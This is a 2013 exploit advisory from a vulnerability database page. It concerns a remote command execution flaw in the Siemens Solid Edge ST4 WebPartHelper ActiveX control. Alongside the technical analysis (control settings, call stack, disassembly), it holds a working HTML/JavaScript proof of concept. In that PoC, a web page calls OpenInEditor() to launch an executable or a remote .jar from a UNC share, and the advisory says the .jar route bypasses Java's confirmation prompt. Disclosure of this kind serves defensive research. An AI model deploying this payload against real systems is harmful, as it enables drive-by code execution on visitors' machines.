SIEMENS Solid Edge ST4 WebPartHelper ActiveX Control

2013.05.26
Credit: rgod
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

SIEMENS Solid Edge ST4 WebPartHelper ActiveX Control RFMSsvs!JShellExecuteEx Remote Command Execution Tested against: Microsoft Windows Server 2003 r2 sp2 Microsoft Windows XP sp3 Internet Explorer 8 Software description: http://en.wikipedia.org/wiki/Solid_Edge vendor site: http://www.siemens.com/entry/cc/en/ Download url: http://www.plm.automation.siemens.com/en_us/products/velocity/forms/solid-edge-student.cfm File tested: SolidEdgeV104ENGLISH_32Bit.exe Background: The mentioned software installs an ActiveX control with the following settings: CLSID: {DD568718-FF20-48EA-973F-0BD5C9FCA522} Progid: SolidEdge.WebPartHelper.1 Binary Path: C:\Program Files\Solid Edge ST4\Program\WPHelper.dll Implements IObjectSafety: True Safe For Initialization (IObjectSafety): False Safe For Scripting (IObjectSafety): True This control *implements* IObjectSafety: IE will query through the IObjectSafety interface for "Safe for Initialization with data" and "Safe For Scripting". According to IObjectSafety interface, this control is Safe for Scripting then IE will allow scripting of this control according to browser security settings. vulnerability: the WebPartHelper Class offers the OpenInEditor() method, see typelib: ... /* DISPID=8 */ function OpenInEditor( /* VT_VARIANT [12] [in] */ $URL ) { } ... By passing an null session share path to the URL argument of this method is possible to launch an arbitrary executable. This is because of a ShellExecuteExW() call inside RFMSsvs.dll Call stack when ShellExecuteExW() is called: Address Stack Procedure / arguments Called from Frame 01B7E140 04AC9F0E SHELL32.ShellExecuteExW RFMSsvs.04AC9F08 01B7F280 01B7F284 022B71AD ? <jmp.&RFMSsvs.JShellExecuteEx> WPHelper.022B71A8 01B7F280 01B7F560 022B85B6 WPHelper.022B6D70 WPHelper.022B85B1 01B7F55C 01B7F5D4 022B87A5 ? WPHelper.022B8380 WPHelper.022B87A0 01B7F5D0 01B7F620 022B89CB WPHelper.022B8710 WPHelper.022B89C6 01B7F61C 01B7F668 7D0E5186 Includes WPHelper.022B89CB OLEAUT32.7D0E5184 01B7F664 01B7F690 7D0F4ACF ? OLEAUT32.DispCallFunc OLEAUT32.7D0F4ACA 01B7F68C 01B7F720 022B58C3 Includes OLEAUT32.7D0F4ACF WPHelper.022B58C1 01B7F71C 01B7F748 40302C02 Includes WPHelper.022B58C3 jscript.40302BFF 01B7F744 01B7F784 40302B6F jscript.40302B90 jscript.40302B6A 01B7F780 01B7F7C0 40302AFA jscript.40302B2E jscript.40302AF5 01B7F7BC 01B7F834 40303555 ? jscript.40302A88 jscript.40303550 01B7F830 01B7F878 40301221 jscript.4030122A jscript.4030121C 01B7F874 01B7F8B8 403011D6 jscript.403011E1 jscript.403011D1 01B7F8B4 01B7F8DC 4030312D jscript.40301182 jscript.40303128 01B7F8D8 WPHelper.dll: ... 022B718A 899D 74FDFFFF mov dword ptr ss:[ebp-28C],ebx 022B7190 8D85 D8FDFFFF lea eax,dword ptr ss:[ebp-228] 022B7196 50 push eax 022B7197 8D8D 60FDFFFF lea ecx,dword ptr ss:[ebp-2A0] 022B719D 51 push ecx 022B719E C785 7CFDFFFF 01>mov dword ptr ss:[ebp-284],1 022B71A8 E8 ADBB0100 call <jmp.&RFMSsvs.JShellExecuteEx> ... RFMSsvs.dll: ... 04AC9ECF 8B85 A4EFFFFF mov eax,dword ptr ss:[ebp-105C] 04AC9ED5 8D8D 4CEFFFFF lea ecx,dword ptr ss:[ebp-10B4] 04AC9EDB 8946 24 mov dword ptr ds:[esi+24],eax 04AC9EDE FF15 0CE3CB04 call dword ptr ds:[<&JUtil.??BGUserText@@QBEPB_WXZ>] ; JUtil.??BGUserText@@QBEPB_WXZ 04AC9EE4 8946 10 mov dword ptr ds:[esi+10],eax 04AC9EE7 C645 FC 02 mov byte ptr ss:[ebp-4],2 04AC9EEB 8D8D D8EEFFFF lea ecx,dword ptr ss:[ebp-1128] 04AC9EF1 E8 6A89F1FF call RFMSsvs.??1JrfmsFileName@@QAE@XZ 04AC9EF6 EB 0F jmp short RFMSsvs.04AC9F07 04AC9EF8 8D8D 84EFFFFF lea ecx,dword ptr ss:[ebp-107C] 04AC9EFE FF15 0CE3CB04 call dword ptr ds:[<&JUtil.??BGUserText@@QBEPB_WXZ>] ; JUtil.??BGUserText@@QBEPB_WXZ 04AC9F04 8946 10 mov dword ptr ds:[esi+10],eax ; eax -> "\\192.168.2.100\uncshare\CmdExec.jar" 04AC9F07 56 push esi 04AC9F08 FF15 E8E6CB04 call dword ptr ds:[<&SHELL32.ShellExecuteExW>] ; SHELL32.ShellExecuteExW ... As attachment, proof of concept code. Note that by pointing OpenInEditor() (and consequently ShellExecuteExW() ) to a remote .jar file as handled in JRE/JDK7u21 is possible to bypass the usual confirmation box. <!-- SIEMENS Solid Edge WebPartHelper ActiveX Control RFMSsvs!JShellExecuteEx Remote Command Execution PoC CLSID: {DD568718-FF20-48EA-973F-0BD5C9FCA522} Progid: SolidEdge.WebPartHelper.1 Binary Path: C:\Program Files\Solid Edge ST4\Program\WPHelper.dll Implements IObjectSafety: True Safe For Initialization (IObjectSafety): False Safe For Scripting (IObjectSafety): True --> <!-- saved from url=(0014)about:internet --> <html> <script> var obj = new ActiveXObject("SolidEdge.WebPartHelper.1"); //launch calc.exe //obj.OpenInEditor("c:\\windows\\system32\\calc.exe"); //bypass the confirmation box, JRE/JDK7u21 obj.OpenInEditor("\\\\192.168.0.1\\uncshare\\CmdExec.jar"); </script>

References:

http://en.wikipedia.org/wiki/Solid_Edge


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top